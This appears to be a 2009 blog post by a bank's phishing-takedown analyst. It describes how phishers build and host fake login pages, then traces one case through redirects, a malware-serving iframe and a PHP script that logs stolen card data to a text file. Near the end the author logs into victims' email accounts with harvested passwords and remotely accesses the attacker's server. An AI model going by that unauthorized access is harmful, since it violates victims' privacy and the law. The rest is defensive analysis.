A Phishy Story

Phishing sounds similar to fishing. Fishes are to the volume of internet users today much like fishermen are to phishers. Zillions of fishes falling prey the nets is nothing less compared to internet users being phished through their own in boxes and messengers. Phishers tend to have some personal favorites – personal information, credit cards numbers, debit cards numbers with ATM pins, etc. Though phishing has been around for a long time, it became more prominent back in 2003. You can read more here on the big scams here.

How does it all work?

A typical modus operandi:

1) The Phisher would either go out and buy a phishing kit from the underground channels or create a look alike page himself.

2) He would then need hacked websites or a server where the pages can be hosted. This can also be easily made available. He would pay or trade for a list of hacked websites on IRC channels, underground forums etc. These are some very common sources for such deals. He could also target systems that are vulnerable to a particular vulnerability or weakness in the website – vulnerability in the hosting providers control panel software, exploit for popular CMS like Joomla, 0day vulnerability in web server, etc. A zero-day (or zero-hour) attack or threat is a computer threat that tries to exploit computer application vulnerabilities that are unknown to others, undisclosed to the software vendor, or for which no security fix is available. (ref : http://en.wikipedia.org/wiki/Zero_day_vulnerability)

3) Once the hacked infrastructure is ready it’s time to spam. They would ideally send out emails in large volumes. These emails are crafted to perfection. They would have the company logo, an appealing message in the email; use the CSS as the company that is phished, etc. All this together make it look perfect. It’s like decorating the devils face with cosmetics to make it look innocent. But not to forget the devil under a thin layer of cosmetics. They will have a crafted link and the hyperlink actually pointing to some website where the pages are hosted.

However, the entire process is a gamble. Some may fall prey to their phish nets while others may not. Over the years, phishing scams have grown from simply stealing accounts into much more dangerous criminal intention. Assuming the user is a prey of the phish net, let us understand the ways in which a phisher can harvest the data of the victim. There are various ways in which this can be done.

1) The attacker here uses services of websites that let you send HTML forms embedded in your email. On submit of this HTML form the phished page will redirect you to the legitimate website. This often tricks the user. They don’t realize what just happened. The details entered on the form are then emailed to the phisher’s inbox that is supposed to collect the details. The most common examples where you can see them are when advertising on the internet.

2) Second, the email is scripted in a way that a user is tempted or forced to visit the copied website. The attacker can also use the tactic mentioned above and use services like www.emailmeform.com. Attacker creates an account here and links his entire phished page to use their service to capture the details and then email it to them. This is the most common method used by phishers. Also the pages are scripted in server side programming languages like PHP, .NET, JSP etc. Doing so it does not expose the modus operandi or the attacker’s identity in any way or other details in any way.

3) The third type is where the phishers use nothing like above and instead writes all the output to a predefined file. In this way he needs no email address or anything mentioned above to capture the user details. This is what I am exactly going to write about.

Since I had some time off before I could start with the next takedown, I decided to dig further. Before we begin let me give you a brief about our service and the client. We offer take down services to a large public sector bank. We have a strict timeline defined of 24 hrs for every takedown. Every time a customer or their monitoring reports a phished page we have to takedown the site to protect the loss of financial and other details. While doing takedowns I also get a chance to research on understanding the modus operandi behind the operation. It is very interesting.

I have just started my day checking my email over a cup of coffee. I receive a new email on Tue 11/3/2009 10:22 AM about a phished link being up with the URL and we need to immediately start the takedown. He also sends me a sample email. We did the usual process and the link was down by noon. Have a look at a sample phishing email.

The email looks so real. It has the logo of the customer and perfect login URL. On hover I found it was actually pointing to some server in Russia. The page ‘retails.html’ simply redirects to the next URL where the phished page is hosted. Have a look at the closing lines of the email below. The phisher uses pressure tactic that will force the user to browse the URL.

Ok I now click and I am now redirected to the URL http://200.119.X.X/retail/login.php. The page looks like this

I then enter some fake details on this page and press the Enter key. I am now redirected to another page called ‘accounts.php’ on the same domain. I quickly check the html source code (view source) of the page to check for the

tag. This is where I would see where the page is going on hitting ‘submit’. I am now redirected to another page hosted on a hacked domain called hxxp://stirileprotv.fnhost.org/bi/ib.php

I go a level up in the URL hxxp://200.119.X.X/retail/login.php and now I see the directory listing. I see 2 files under the retail folder namely ‘login.php’ and ‘accounts.php’. Directory Listing has been common in all my takedowns. They don’t really care for the directory listings. What I also observed, at the bottom of the ‘account.php’ page is more interesting. The page is has an IFRAME with src pointing to http:// statanalyze. cn /lib/ index.php. This is some malware getting downloaded on victim system.

My anti virus immediately pops up an alert that a malware is getting downloaded. And it immediately blocks it. Coming back to ‘accounts.php’ it asks for my Name, email address, credit card number, ATM pin and expiration date. On entering some fake details I am now redirected to a third domain hxxp://stirileprotv.fnhost.org/bi/ib.php. And from ‘ib.php’ it redirects me to the legitimate page of my client website. I have changed that to hxxp://www.google.com in the code snippet. Aren’t these guys sick of so many re directions? Not really they have a smart modus operandi. They don’t use one domain to complete their operation.

I again go a level up on the http://stirileprotv.fnhost.org/bi/ib.php. What I happen to find is something even more interesting. It had a page ‘ib.php’ under the ib folder and a .txt file. When I tried accessing the file what I find is the actual account details of the people who have fallen prey to the trick with their usernames, credit card numbers, internet banking IDs and passwords. Check file snippet below

I then contact the client to freeze the accounts and get in touch with the hosting providers. I make sure I ask the hosting providers to provide me with the pages as they aid to my research in understanding various modus operandi out on pr0wl. Most of the time they don’t give the pages but this time I was lucky. The tech support guys actually emailed me the contents of the ib folder. Have a look at the php code

Let me explain the code in brief. It opens a stream to a file called x-account-all.txt and then captures the post variables from the URL http://200.119.X.X/retail/accounts.php. The following table explains what each variable means

I thought that was it. I was done with my research. I relaxed a bit and stretched my arms. But hold on readers I recollect that the website was also vulnerable to IFRAME injection. No more research on this malware guys I have colleagues who enjoys this. I will send this to him. Till he comes up with his analysis there are some who have already done it. Check the link below

http://wepawet.iseclab.org/view.php?hash=363c95666cf1e80072656c7b562c4dbb&type=js

http://anubis.iseclab.org/?action=result&task_id=1c109b3e2cc07d1f49168943cc884e1d2

http://www.virustotal.com/analisis/837508d65acc78ec684c0d7a907bea7f49ce223052a18a076240018fc61a0d7f-1257141946

I was still way too itchy to pull down a full stop. I picked some arbitrary entries from the file and picked the ‘ea’ and ‘bb’ field. Why only them? (I got this particular combination after trying out a few) I was able to login to the Yahoo accounts of the victim since the password used was the same for both the accounts. I then checked the spam box and found the email that the victim had received. There were similar emails and to my surprise I found another URL hosting the phished page. Ok guys that’s it, I need to get back to my next takedown immediately  Oh! By the way, this time it is some Windows 2003 server behind some ADSL router running the phished page on a XAMP server. I did RDP to the box, 3389 was found open. I will come back if I find something more interesting.

All the details in this post have being changed or rename to protect real identity of our client.

Adios!
Taufiq Ali

  •  
  •  
  •  
  •  
  •  
  •  
  •